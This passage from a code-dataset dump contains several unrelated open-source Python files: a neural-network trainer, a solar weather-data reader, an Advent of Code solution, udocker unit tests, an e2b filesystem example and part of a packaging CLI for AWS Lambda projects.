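# Let the server do the id filtering instead of scanning the whole join.
cur.execute(
    "SELECT * FROM characters RIGHT JOIN anime ON characters.animeFK = anime.id"
    " WHERE characters.id IN (%s, %s)",
    (3, 4),
)
for row in cur.fetchall():
    print(*row)
cur.close()
con.close()
```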
our data to increase data size\n noisy_X = pd.DataFrame()\n mu=0\n for i in range(X.shape[1]):\n #standard deviation of each column that corresponds to 'off' state \n std = X[(~y_data.astype(bool)).values][:][i].std()\n print(std)\n #std = X[y_data.values][:][i].std()\n noise = np.random.normal(mu, std, size = X[:][i].shape)\n noisy_X[i] = X[:][i] + noise\n\n X = pd.concat([X, noisy_X], axis=0)\n Y = pd.DataFrame(to_categorical(y = y_data, num_classes = 2)) \n Y = pd.concat([Y, Y], axis=0) \n \n #split training from test data\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.2, random_state = 1)\n \n return (x_data, X_train, X_test, Y_train, Y_test)\n\ndef build_train_model(model_name, x_data, X_train, X_test, Y_train, Y_test):\n #BUILD\n # Create the neural network\n nn = Sequential()\n nn.add(Dense(100, input_shape = (4, ), activation = 'relu'))\n nn.add(Dense(2, activation = 'softmax'))\n\n # Create our optimizer\n sgd = SGD(learning_rate = 0.2)\n\n #TRAIN\n # 'Compile' the network to associate it with a loss function,\n # an optimizer, and what metrics we want to track\n nn.compile(loss='categorical_crossentropy', optimizer=sgd, metrics = 'accuracy')\n \n #save file as '.hd5'\n checkpoint = ModelCheckpoint(model_name)\n \n nn.fit(X_train, Y_train, shuffle = True, epochs = 100, validation_data = (X_test, Y_test), callbacks=[checkpoint])\n \n #save max and min values for later scaling\n update_extremes(x_data, model_name)\n\ndef update_extremes(x_values, model_name):\n f = open(model_name + \"/extremes.csv\",\"w\")\n for i in range(x_values.shape[1]):\n max_val = x_values.iloc[:,i].max()\n min_val = x_values.iloc[:,i].min()\n f.write(str(min_val) + \"; \" + str(max_val) + \"\\n\")\n \ndef main():\n (x_data, X_train, X_test, Y_train, Y_test) = process_data(DATA_FILE)\n #parameters to test out: epochs, learning_rate, amount of layers, width of layers, loss, activation\n build_train_model(MODEL_FILE, x_data, X_train, X_test, Y_train, Y_test)\n\nif __name__ == '__main__':\n main()\n","repo_name":"MohammedHamlili/Laundromates_IOT","sub_path":"IOT_project_final/ML_model/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5997710874","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 12 10:22:47 2016\n\nRead in weather data\n\n@author: l.kotzur\n\"\"\"\nimport os\nimport pvlib\nimport math\n\nimport numpy as np\nimport pandas as pd\n\nimport tsib.data\nimport tsib\n\n# ignore pv lib warnings\nnp.seterr(divide=\"ignore\")\nnp.seterr(invalid=\"ignore\")\n\n\n\ndef calcGHI(timeSeries, longitude, latitude):\n \"\"\"\n Calculates the global horizontal irradiation (GHI) by time, diffuse\n horizontal irradiation (DHI) and direct normal irradiation (DNI).\n \"\"\"\n solarPos = pvlib.solarposition.get_solarposition(\n timeSeries.index, latitude, longitude\n )\n if \"DNI\" in timeSeries:\n timeSeries[\"GHI\"] = timeSeries[\"DHI\"] + timeSeries[\"DNI\"] * math.cos(\n math.radians(solarPos[\"apparent_zenith\"])\n )\n elif \"B\" in timeSeries: # Direct horizontal irradiation TRY\n timeSeries[\"GHI\"] = timeSeries[\"DHI\"] + timeSeries[\"B\"]\n return timeSeries\n\n\ndef readTMY(filepath=os.path.join(\"TMY\", \"Germany DEU Koln (INTL).csv\")):\n \"\"\"\n Reads a typical meteorological year file and gets the GHI, DHI and DNI from it.\n \"\"\"\n # get data\n data = pd.read_csv(\n os.path.join(tsib.data.PATH, \"weatherdata\", filepath),\n skiprows=([0, 
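The augmentation loop in the neural-network record above derives per-column Gaussian noise from the rows labelled "off" only, then doubles the dataset. A self-contained sketch of the same idea on synthetic data:

```python
# Standalone illustration with made-up data; only the recipe matches the
# snippet above (per-column std of the False-labelled rows as noise scale).
import numpy as np
import pandas as pd

rng = np.random.default_rng(1)
X = pd.DataFrame(rng.random((8, 4)))
y = pd.Series([True, False] * 4)

noisy = X.copy()
for col in X.columns:
    std = X.loc[~y, col].std()                        # spread of "off" rows
    noisy[col] = X[col] + rng.normal(0.0, std, size=len(X))
augmented = pd.concat([X, noisy], axis=0)             # doubles the sample count
```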
1]),\n sep=\",\",\n )\n data.index = pd.date_range(\n \"2010-01-01 00:30:00\", periods=8760, freq=\"H\", tz=\"Europe/Berlin\"\n )\n data = data.rename(\n columns={\"Beam\": \"DNI\", \"Diffuse\": \"DHI\", \"Tdry\": \"T\", \"Wspd\": \"WS\"}\n )\n location_data = pd.read_csv(\n os.path.join(tsib.data.PATH, \"profiles\", filepath), nrows=1, sep=\",\"\n )\n\n location = {\n \"name\": location_data[\"City\"].values[0],\n \"latitude\": location_data[\"Latitude\"].values[0],\n \"longitude\": location_data[\"Longitude\"].values[0],\n }\n return data, location\n\n\n\ndef readTRY(try_num=4, year=2010):\n \"\"\"\n Reads a test refence year file and gets the GHI, DHI and DNI from it.\n \n Parameters\n -------\n try_num: int (default: 4)\n The region number of the test reference year.\n year: int (default: 2010)\n The year. Only data for 2010 and 2030 available\n \"\"\"\n # get the correct file path\n filepath = os.path.join(\n tsib.data.PATH,\n \"weatherdata\",\n \"TRY\",\n \"TRY\" + str(year) + \"_\" + str(try_num).zfill(2) + \"_Jahr\",\n )\n\n # get the geoposition\n with open(filepath + \".dat\", encoding=\"utf-8\") as fp:\n lines = fp.readlines()\n location_name = lines[1][9:-18].encode(\"utf-8\").rstrip()\n lat = float(lines[2][6:8]) + float(lines[2][9:11]) / 60.0\n lon = float(lines[2][21:23]) + float(lines[2][24:26]) / 60.0\n location = {\"name\": location_name, \"latitude\": lat, \"longitude\": lon}\n\n # check if time series data already exists as .csv with DNI\n if os.path.isfile(filepath + \".csv\"):\n data = pd.read_csv(filepath + \".csv\", index_col=0, parse_dates=True)\n data.index = pd.to_datetime(data.index, utc=True).tz_convert(\"Europe/Berlin\")\n # else read from .dat and calculate DNI etc.\n else:\n # get data\n data = pd.read_csv(\n filepath + \".dat\", sep=r\"\\s+\", skiprows=([i for i in range(0, 36)] + [37])\n )\n data.index = pd.date_range(\n \"2010-01-01 00:30:00\", periods=8760, freq=\"H\", tz=\"Europe/Berlin\"\n )\n data[\"GHI\"] = data[\"D\"] + data[\"B\"]\n data = data.rename(columns={\"D\": \"DHI\", \"t\": \"T\", \"WG\": \"WS\"})\n\n # calculate direct normal\n data[\"DNI\"] = calculateDNI(data[\"B\"], lon, lat)\n\n # save as .csv\n data.to_csv(filepath + \".csv\")\n return data, location\n\n\n\ndef calculateDNI(directHI, lon, lat, zenith_tol=87.0):\n \"\"\"\n Calculates the direct NORMAL irradiance from the direct horizontal irradiance with the help of the PV lib.\n\n Parameters\n ----------\n directHI: pd.Series with time index\n Direct horizontal irradiance\n lon: float\n Longitude of the loaction\n lat: float\n Latitude of the location\n zenith_tol: float, optional\n Avoid cosinus of values above a certain zenith angle of in order to avoid division by zero.\n\n Returns\n -------\n DNI: pd.Series\n \"\"\"\n solarPos = pvlib.solarposition.get_solarposition(directHI.index, lat, lon)\n solarPos[\"apparent_zenith\"][solarPos.apparent_zenith > zenith_tol] = zenith_tol\n DNI = directHI.div(solarPos[\"apparent_zenith\"].apply(math.radians).apply(math.cos))\n if DNI.isnull().values.any():\n raise ValueError(\"Something went wrong...\")\n return DNI\n\n\ndef TRY2TM2(trydata):\n \"\"\"\n Takes a pd.DataFrame from the readTRY function and translate the column\n names to the TM2 format.\n \"\"\"\n trydata[\"Year\"] = 2010\n trydata = trydata.rename(\n columns={\n \"MM\": \"Month\",\n \"DD\": \"Day\",\n \"HH\": \"Hour\",\n \"T\": \"Tdry\",\n \"p\": \"Pres\",\n \"WR\": \"Wdir\",\n \"WS\": \"Wspd\",\n }\n )\n trydata[\"Tdew\"] = trydata[\"Tdry\"]\n\n return trydata[\n [\n \"Year\",\n 
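Note that `calcGHI` above pushes a whole pandas Series through `math.cos(math.radians(...))`, which raises a `TypeError` on Series input, and `calculateDNI` works around the same limitation with two `Series.apply` calls. A vectorized numpy sketch of the zenith-clamped conversion (the helper name is hypothetical):

```python
import numpy as np
import pandas as pd

def dni_from_direct_horizontal(direct_hi: pd.Series,
                               apparent_zenith: pd.Series,
                               zenith_tol: float = 87.0) -> pd.Series:
    # Clamp near-horizon zenith angles so cos() never reaches zero.
    zen = np.minimum(apparent_zenith, zenith_tol)
    return direct_hi / np.cos(np.radians(zen))
```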
\"Month\",\n \"Day\",\n \"Hour\",\n \"GHI\",\n \"DHI\",\n \"Tdry\",\n \"Tdew\",\n \"Pres\",\n \"Wdir\",\n \"Wspd\",\n ]\n ]\n\n\ndef TRY2TMY(trydata):\n \"\"\"\n Takes a pd.DataFrame from the readTRY function and translate the column\n names to the TM2 format.\n \"\"\"\n return trydata.rename(\n columns={\n \"MM\": \"Month\",\n \"DD\": \"Day\",\n \"HH\": \"Hour\",\n \"T\": \"DryBulb\",\n \"p\": \"Pressure\",\n \"WR\": \"Wdir\",\n \"WS\": \"Wspd\",\n }\n )\n\n\n\ndef getISO12831weather(longitude, latitude, year=2010, cosmo=False):\n \"\"\"\n\n Gets the test reference year location and the design temperatures for\n the heating system based on the ISO12831.\n Parameters\n ----------\n longitude: float\n latitude: float\n year: int, optional (default: 2010)\n cosmo: bool, optional (default: False)\n If the weather data shall be extracted from the cosmo database.\n Returns\n -------\n weather (DataFrame with TRY weather)\n T_min (design temperature for heating),\n weatherID (str with climate zone)\n \"\"\"\n\n # read weather zones\n wzones = pd.read_csv(\n os.path.join(tsib.data.PATH, \"weatherdata\", \"ISO12831\", \"T_zones_Ger_final.csv\"),\n index_col=0,\n encoding=\"ISO-8859-1\",\n )\n\n # get distance to all reference weather station points\n dist = ((wzones[\"Lat\"] - latitude) ** 2 + (wzones[\"Lng\"] - longitude) ** 2) ** 0.5\n\n # if distance to next reference position is to high.\n if min(dist) > 5:\n raise NotImplementedError(\n \"The weather data is at the moment\" + \" only implemented for Germany\"\n )\n\n # get the data from the one with the minimal distance\n loc_w = wzones.loc[dist.idxmin(), :]\n design_T_min = loc_w[\"Min T\"]\n\n # read weather data of related try region\n if not cosmo:\n weatherID = \"TRY_\" + str(loc_w[\"Climate Zone\"])\n weather, loc = readTRY(try_num=loc_w[\"Climate Zone\"], year=year)\n else:\n weather, weatherID = tsib.readCosmo(\n os.path.join(\n os.environ[\"DATA_SHARE\"], \"weather\", \"cosmo\", \"rea6\", \"processed\"\n ),\n longitude,\n latitude,\n year,\n )\n\n return weather, design_T_min, weatherID\n\n\n","repo_name":"FZJ-IEK3-VSA/tsib","sub_path":"tsib/weather/testreferenceyear.py","file_name":"testreferenceyear.py","file_ext":"py","file_size_in_byte":7419,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"34"} +{"seq_id":"10193489439","text":"import numpy as np\n\ndef read_from_input():\n with open('input.txt', 'r') as f:\n return f.read()\n\ndots, folds = [x.split('\\n') for x in read_from_input().split('\\n\\n')]\n\nmax_x = 0\nmax_y = 0\n\nclass Point:\n def __init__(self, x, y):\n global max_x, max_y\n self.x = x\n self.y = y\n if x > max_x:\n max_x = x\n if y > max_y:\n max_y = y\n\n def __str__(self):\n return f'({self.x}, {self.y})'\n \n def __repr__(self):\n return self.__str__()\n\nclass Fold:\n axis: str\n value: int\n\n def __init__(self, axis: str, value: str):\n self.axis = axis\n self.value = int(value)\n \n def __str__(self):\n return f\"(axis: {self.axis}, value: {self.value})\"\n \n def __repr__(self):\n return self.__str__()\n\n\ndots = [Point(*map(int, x.split(','))) for x in dots]\nfolds = [Fold(*x.split(' ')[-1].split('=')) for x in folds]\n\nmatrix = np.zeros(shape=(max_y+1, max_x+1))\nfor dot in dots:\n matrix[dot.y][dot.x] = 1\n\ndef do_fold(matrix: np.array, fold: Fold):\n rows, cols = matrix.shape\n if fold.axis == 'y':\n new_matrix = matrix[0:fold.value, :]\n else:\n new_matrix = matrix[:, 0:fold.value]\n if fold.axis == 'x':\n for i in range(rows):\n for j in 
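`getISO12831weather` above picks the nearest reference station by plain Euclidean distance in degrees and refuses anything farther than 5. A toy reproduction of that lookup with an invented two-row stand-in for `T_zones_Ger_final.csv`:

```python
# The station table here is made up; only the lookup logic mirrors the code.
import pandas as pd

stations = pd.DataFrame({"Lat": [50.9, 52.5], "Lng": [6.9, 13.4],
                         "Min T": [-12.0, -14.0]}, index=["Koeln", "Berlin"])
lat, lon = 51.0, 7.0
dist = ((stations["Lat"] - lat) ** 2 + (stations["Lng"] - lon) ** 2) ** 0.5
if dist.min() > 5:
    raise NotImplementedError("only implemented for Germany")
print(stations.loc[dist.idxmin(), "Min T"])   # design temperature of nearest zone
```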
range(fold.value):\n if new_matrix[i][j] == 0:\n new_matrix[i][j] = matrix[i][cols - j - 1]\n elif fold.axis == 'y':\n for i in range(fold.value):\n for j in range(cols):\n if new_matrix[i][j] == 0:\n new_matrix[i][j] = matrix[rows - i - 1][j]\n\n return new_matrix\n\ndef visible_dots(matrix: np.array):\n rows, cols = matrix.shape\n visible = 0\n for i in range(rows):\n for j in range(cols):\n if matrix[i][j] == 1:\n visible += 1\n return visible\n\nfor i, f in enumerate(folds):\n matrix = do_fold(matrix, f)\n if i == 0:\n print(f\"Visible dots after first fold: {visible_dots(matrix)}\")\n\nfor row in matrix:\n for value in row:\n print('#' if value == 1 else '.', end='')\n print('\\n')","repo_name":"Atari2/AdventOfCode2021","sub_path":"day13/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"984661713","text":"#!/usr/bin/env python\n\"\"\"\nudocker unit tests: NVIDIA mode\n\"\"\"\n\nfrom unittest import TestCase, main\nfrom unittest.mock import patch, Mock\nfrom udocker.config import Config\nfrom udocker.engine.nvidia import NvidiaMode\nimport collections\n\ncollections.Callable = collections.abc.Callable\n\n\nclass NvidiaModeTestCase(TestCase):\n \"\"\"Test PRootEngine() class for containers execution.\"\"\"\n\n def setUp(self):\n Config().getconf()\n Config().conf['nvi_dev_list'] = ['/dev/nvidia']\n self.cont_id = \"12345a\"\n str_local = 'udocker.container.localrepo.LocalRepository'\n self.lrepo = patch(str_local)\n self.local = self.lrepo.start()\n self.mock_lrepo = Mock()\n self.local.return_value = self.mock_lrepo\n str_cd = str_local + '.cd_container'\n self.cdcont = patch(str_cd, return_value=\"/\" + self.cont_id)\n self.mock_cdcont = self.cdcont.start()\n\n def tearDown(self):\n self.lrepo.stop()\n self.cdcont.stop()\n\n def test_01_init(self):\n \"\"\"Test01 NvidiaMode() constructor.\"\"\"\n cdir = \"/\" + self.cont_id\n nvmode = NvidiaMode(self.local, self.cont_id)\n self.assertTrue(self.mock_cdcont.called)\n self.assertEqual(nvmode.container_dir, cdir)\n self.assertEqual(nvmode.container_root, cdir + \"/ROOT\")\n self.assertEqual(nvmode._container_nvidia_set, cdir + \"/nvidia\")\n\n @patch('udocker.engine.nvidia.os.path.exists')\n def test_02__files_exist(self, mock_exists):\n \"\"\"Test02 NvidiaMode._files_exist.\"\"\"\n cont_dst_dir = \"/home/.udocker/container\"\n files_list = [\"a\", \"b\"]\n mock_exists.return_value = False\n nvmode = NvidiaMode(self.local, self.cont_id)\n nvmode._files_exist(cont_dst_dir, files_list)\n self.assertTrue(mock_exists.called)\n\n @patch('udocker.engine.nvidia.Msg')\n @patch('udocker.engine.nvidia.os.access')\n @patch('udocker.engine.nvidia.stat')\n @patch('udocker.engine.nvidia.shutil.copy2')\n @patch('udocker.engine.nvidia.os.symlink')\n @patch('udocker.engine.nvidia.os.readlink')\n @patch('udocker.engine.nvidia.os.chmod')\n @patch('udocker.engine.nvidia.os.makedirs')\n @patch('udocker.engine.nvidia.os.path.isdir')\n @patch('udocker.engine.nvidia.os.path.dirname')\n @patch('udocker.engine.nvidia.os.remove')\n @patch('udocker.engine.nvidia.os.path.islink')\n @patch('udocker.engine.nvidia.os.path.isfile')\n def test_03__copy_files(self, mock_isfile, mock_islink, mock_rm,\n mock_dirname, mock_isdir, mock_mkdir, mock_chmod,\n mock_readln, mock_symln, mock_copy2, mock_stat,\n mock_access, mock_msg):\n \"\"\"Test03 NvidiaMode._copy_files.\"\"\"\n hsrc_dir = \"/usr/lib\"\n cdst_dir = 
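`do_fold` in the Advent-of-Code record above mirrors cells one loop iteration at a time. Because the dots are stored as 0/1, the same fold can be written as a flip plus an element-wise maximum; a sketch, assuming the fold line sits exactly mid-grid as in the puzzle input:

```python
import numpy as np

def fold_vectorized(matrix: np.ndarray, axis: str, value: int) -> np.ndarray:
    # maximum() acts as logical OR on 0/1 grids; the fold row/column itself
    # is dropped, so both halves have identical shape for a centered fold.
    if axis == "y":
        return np.maximum(matrix[:value, :], np.flipud(matrix[value + 1:, :]))
    return np.maximum(matrix[:, :value], np.fliplr(matrix[:, value + 1:]))
```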
\"/hone/.udocker/cont/ROOT/usr/lib\"\n flist = [\"a\"]\n force = False\n mock_msg.level = 0\n mock_isfile.side_effect = [True, False]\n mock_islink.side_effect = [True, False]\n mock_rm.return_value = None\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode._copy_files(hsrc_dir, cdst_dir, flist, force)\n self.assertFalse(status)\n self.assertTrue(mock_isfile.called)\n\n force = True\n mock_msg.level = 0\n mock_isfile.side_effect = [True, True]\n mock_islink.side_effect = [True, False]\n mock_dirname.side_effect = [None, None]\n mock_rm.return_value = None\n mock_isdir.return_value = True\n mock_mkdir.return_value = None\n mock_chmod.side_effect = [644, 755]\n mock_readln.return_value = \"/usr/xxx\"\n mock_symln.return_value = None\n mock_copy2.return_value = None\n mock_stat.side_effect = [444, 222, 111, 111]\n mock_access.return_value = False\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode._copy_files(hsrc_dir, cdst_dir, flist, force)\n self.assertTrue(status)\n self.assertTrue(mock_isfile.called)\n self.assertTrue(mock_rm.called)\n\n @patch('udocker.engine.nvidia.glob.glob')\n def test_04__get_nvidia_libs(self, mock_glob):\n \"\"\"Test04 NvidiaMode._get_nvidia_libs.\"\"\"\n host_dir = \"/usr/lib\"\n Config.conf['nvi_lib_list'] = ['/lib/libnvidia.so']\n mock_glob.return_value = ['/lib/libnvidia.so']\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode._get_nvidia_libs(host_dir)\n # self.assertEqual(status, Config.conf['nvi_lib_list'])\n\n # @patch('udocker.engine.nvidia.os.path.realpath')\n # @patch('udocker.engine.nvidia.Uprocess.get_output')\n # def test_05__find_host_dir_ldconfig(self, mock_uproc, mock_realp):\n # \"\"\"Test05 NvidiaMode._find_host_dir_ldconfig.\"\"\"\n # res_set = set()\n # mock_uproc.return_value = \\\n # \"libnvidia-cfg.so.1 (libc6,x86-64) => \\\n # /lib/x86_64-linux-gnu/libnvidia-cfg.so.1\"\n # mock_realp.return_value = \"/lib/x86_64-linux-gnu/libnvidia-cfg.so.1\"\n # res_set.add(\"/lib/x86_64-linux-gnu/\")\n # nvmode = NvidiaMode(self.local, self.cont_id)\n # status = nvmode._find_host_dir_ldconfig()\n # self.assertEqual(status, res_set)\n\n # def test_06__find_host_dir_ldpath(self):\n # \"\"\"Test06 NvidiaMode._find_host_dir_ldpath.\"\"\"\n\n @patch.object(NvidiaMode, '_find_host_dir_ldconfig')\n @patch.object(NvidiaMode, '_find_host_dir_ldpath')\n @patch('udocker.engine.nvidia.Msg')\n def test_07__find_host_dir(self, mock_msg, mock_ldpath, mock_ldconf):\n \"\"\"Test07 NvidiaMode._find_host_dir.\"\"\"\n res = set()\n mock_msg.return_value.level.return_value = 0\n mock_ldpath.side_effect = [res, res]\n mock_ldconf.return_value = res\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode._find_host_dir()\n self.assertEqual(status, res)\n self.assertTrue(mock_ldpath.called)\n self.assertTrue(mock_ldconf.called)\n\n res = set()\n res.add(\"/lib/x86_64-linux-gnu/\")\n mock_msg.return_value.level.return_value = 0\n mock_ldpath.side_effect = [set(), set()]\n mock_ldconf.return_value = res\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode._find_host_dir()\n self.assertEqual(status, res)\n\n @patch('udocker.engine.nvidia.os.path.isdir')\n @patch('udocker.engine.nvidia.Msg')\n def test_08__find_cont_dir(self, mock_msg, mock_isdir):\n \"\"\"Test08 NvidiaMode._find_cont_dir.\"\"\"\n cdir = \"\"\n mock_msg.return_value.level.return_value = 0\n mock_isdir.side_effect = [False, False]\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode._find_cont_dir()\n self.assertEqual(status, cdir)\n\n cdir 
= \"/usr/lib/x86_64-linux-gnu\"\n mock_msg.return_value.level.return_value = 0\n mock_isdir.side_effect = [True, False]\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode._find_cont_dir()\n self.assertEqual(status, cdir)\n\n @patch.object(NvidiaMode, '_get_nvidia_libs')\n @patch.object(NvidiaMode, '_find_host_dir_ldconfig')\n @patch('udocker.engine.nvidia.Msg')\n def test_09__installation_exists(self, mock_msg, mock_ldconf,\n mock_libs):\n \"\"\"Test09 NvidiaMode._installation_exists.\"\"\"\n host_dir = \"/usr/lib\"\n cont_dir = \"/home/.udocker/cont/usr/lib\"\n mock_msg.return_value.level.return_value = 0\n mock_ldconf.side_effect = [set(), set(), set()]\n mock_libs.return_value = ['/lib/libnvidia.so']\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode._installation_exists(host_dir, cont_dir)\n self.assertFalse(status)\n\n @patch('udocker.engine.nvidia.FileUtil.putdata')\n @patch.object(NvidiaMode, '_copy_files')\n @patch.object(NvidiaMode, '_get_nvidia_libs')\n @patch.object(NvidiaMode, '_installation_exists')\n @patch.object(NvidiaMode, '_find_cont_dir')\n @patch.object(NvidiaMode, '_find_host_dir')\n @patch('udocker.engine.nvidia.Msg')\n def test_10_set_mode(self, mock_msg, mock_findhdir,\n mock_findcdir, mock_instexist, mock_libs,\n mock_cpfiles, mock_futilput):\n \"\"\"Test10 NvidiaMode.set_mode().\"\"\"\n mock_msg.return_value.level.return_value = 0\n self.mock_cdcont.return_value = \"\"\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode.set_mode()\n self.assertTrue(mock_msg().err.called)\n self.assertFalse(status)\n\n self.mock_cdcont.return_value = \"/home/.udocker/cont\"\n mock_findhdir.return_value = set()\n mock_findcdir.return_value = \"/usr/lib/x86_64-linux-gnu\"\n nvmode = NvidiaMode(self.local, self.cont_id)\n nvmode.container_dir = \"/\" + self.cont_id\n status = nvmode.set_mode()\n self.assertTrue(mock_msg().err.called)\n self.assertFalse(status)\n\n self.mock_cdcont.return_value = \"/home/.udocker/cont\"\n host_dir = set()\n mock_findhdir.return_value = host_dir.update(\"/usr/lib\")\n mock_findcdir.return_value = \"\"\n nvmode = NvidiaMode(self.local, self.cont_id)\n nvmode.container_dir = \"/\" + self.cont_id\n status = nvmode.set_mode()\n self.assertTrue(mock_msg().err.called)\n self.assertFalse(status)\n\n # TODO: need work\n self.mock_cdcont.return_value = \"/home/.udocker/cont\"\n host_dir = set()\n host_dir.add(\"/usr/lib\")\n mock_findhdir.return_value = host_dir\n mock_findcdir.return_value = \"/usr/lib/x86_64-linux-gnu\"\n mock_libs.return_value = ['/lib/libnvidia.so']\n mock_instexist.return_value = False\n mock_cpfiles.side_effect = [True, True, True]\n mock_futilput.return_value = None\n nvmode = NvidiaMode(self.local, self.cont_id)\n nvmode.container_dir = \"/\" + self.cont_id\n status = nvmode.set_mode(True)\n self.assertTrue(mock_findhdir.called)\n self.assertTrue(mock_findcdir.called)\n # self.assertTrue(mock_instexist.called)\n # self.assertTrue(mock_futilput.called)\n # self.assertTrue(status)\n\n @patch('udocker.engine.nvidia.os.path.exists')\n def test_11_get_mode(self, mock_exists):\n \"\"\"Test11 NvidiaMode.get_mode().\"\"\"\n mock_exists.return_value = True\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode.get_mode()\n self.assertTrue(mock_exists.called)\n self.assertTrue(status)\n\n @patch('udocker.engine.nvidia.glob.glob')\n def test_12_get_devices(self, mock_glob):\n \"\"\"Test12 NvidiaMode.get_devices().\"\"\"\n mock_glob.return_value = ['/dev/nvidia']\n nvmode = 
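The stacked `@patch` decorators in the udocker tests above hand their mocks to the test method bottom-up, which is why `mock_msg` (the decorator closest to the function) always arrives first after `self`. A minimal demonstration of that ordering:

```python
# Toy test, independent of udocker: only the decorator ordering is the point.
import os
from unittest import TestCase
from unittest.mock import patch

class DecoratorOrderDemo(TestCase):
    @patch("os.path.isdir")     # topmost decorator -> last mock argument
    @patch("os.path.isfile")    # bottommost decorator -> first mock argument
    def test_order(self, mock_isfile, mock_isdir):
        mock_isfile.return_value = True
        mock_isdir.return_value = False
        self.assertTrue(os.path.isfile("anything"))
        self.assertFalse(os.path.isdir("anything"))
```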
NvidiaMode(self.local, self.cont_id)\n status = nvmode.get_devices()\n self.assertEqual(status, Config().conf['nvi_dev_list'])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"indigo-dc/udocker","sub_path":"tests/unit/test_nvidia.py","file_name":"test_nvidia.py","file_ext":"py","file_size_in_byte":10913,"program_lang":"python","lang":"en","doc_type":"code","stars":1118,"dataset":"github-code","pt":"34"} +{"seq_id":"33748283366","text":"from e2b import Session\n\nsession = Session.create(id=\"Nodejs\")\n\n# List the root directory\ncontent = session.filesystem.list(\"/\") # $HighlightLine\nfor item in content:\n print(f\"Is '{item.name}' directory?\", item.is_dir)\n\nsession.close()\n","repo_name":"mvandermeulen/e2b","sub_path":"apps/docs/src/code/python/basics/fs_ls.py","file_name":"fs_ls.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"38193368570","text":"import os\nimport subprocess\nimport click\n\n@click.group()\n#@click.option('--verbose', '-v', is_flag=True, help=\"Enables verbose output (not implemented)\")\ndef main():\n pass\n\n@main.command()\n@click.option('--project', '-p', default=\"lambdaify-project\", help=\"Name of the project. (Default: 'Lambdaify')\")\n@click.option('--project_directory', '-d', default='./', help=\"Directory to create project\")\n@click.option('--virtual_directory', '-v', help=\"Directory to create virtual environment (Default: Project dir\")\n@click.option('--python', default='/usr/local/bin/python3', help=\"Path to python executable for virtualenv (Default: /usr/local/bin/python3')\")\n@click.pass_context\ndef start(ctx, project, project_directory, python, virtual_directory):\n \"\"\"Create a project and a virtual environment\"\"\"\n abspath = os.path.abspath(__file__)\n dname = os.path.dirname(os.path.dirname(abspath))\n try:\n os.mkdir(project)\n subprocess.call('cp -r {}/project-template/ {}/{}'.format(dname, project_directory, project), shell=True)\n\n if not virtual_directory:\n virtual_directory = './{}'.format(project)\n ctx.invoke(virtualify, virtual_directory=virtual_directory, project=project)\n\n os.chdir('./{}'.format(project))\n print(os.getcwd())\n os.putenv('LAMBDAIFY_PROJECT', project)\n os.putenv('LAMBDAIFY_PROJECT_DIR', os.getcwd())\n\n click.echo(\"Created the project '{}' and its {} environment. 
Standing by to Lambdaify.\".format(project, python))\n except Exception as err:\n click.echo('Failed to startify {}: {}'.format(project, err))\n\n\n@main.command()\n@click.option('--virtual_directory', '-v', default='./', help=\"Directory to create virtual environment\")\n@click.option('--python', default='/usr/local/bin/python3', help=\"Path to python executable for virtualenv (Default: /usr/local/bin/python3)\")\ndef virtualify(virtual_directory, python, project=''):\n \"\"\"Create a virtualenv for a current project\"\"\"\n subprocess.call('virtualenv --python={} {}/.{}_venv'.format(python, virtual_directory, project), shell=True)\n click.echo(\"Run 'source {}{}venv/bin/activate' to use {}'s virtualenv\".format(virtual_directory, project, project))\n\n@main.command()\ndef stage():\n \"\"\"Create a staging directory in the virtual env\"\"\"\n click.echo('Stagifying project.')\n virtual_directory = os.environ['VIRTUAL_ENV']\n project_directory = os.environ['PWD']\n\n click.echo('\\tShipping the packages')\n os.chdir(virtual_directory)\n subprocess.call('rm -rf stageify', shell=True)\n os.mkdir('stageify')\n subprocess.call('cp -r {}/lib/python3.6/site-packages/ ./stageify/'.format(virtual_directory), shell=True)\n\n click.echo('\\tHunting for eggs.')\n stage_dir_items = os.listdir('./stageify')\n eggs = [item for item in stage_dir_items if item.endswith('egg-link')]\n egg_links = []\n for egg in eggs:\n click.echo('\\t\\t{}'.format(egg))\n f = open('./stageify/{}'.format(egg), 'r')\n egg_links.append(f.readline().rstrip('\\n'))\n f.close()\n for link in egg_links:\n egg_info = [item for item in os.listdir('{}'.format(link)) if item.endswith('egg-info')]\n f = open('{}/{}/top_level.txt'.format(link, egg_info[0]), 'r')\n top_level_files = f.readlines()\n f.close()\n for file in top_level_files:\n file = file.rstrip('\\n')\n subprocess.call('cp -r {}/{} ./stageify/'.format(link, file), shell=True)\n click.echo('\\t\\t- Copied {}/{} to staging area'.format(link, file))\n\n click.echo('\\tArming your lasers.')\n os.chdir(project_directory)\n subprocess.call('find . 
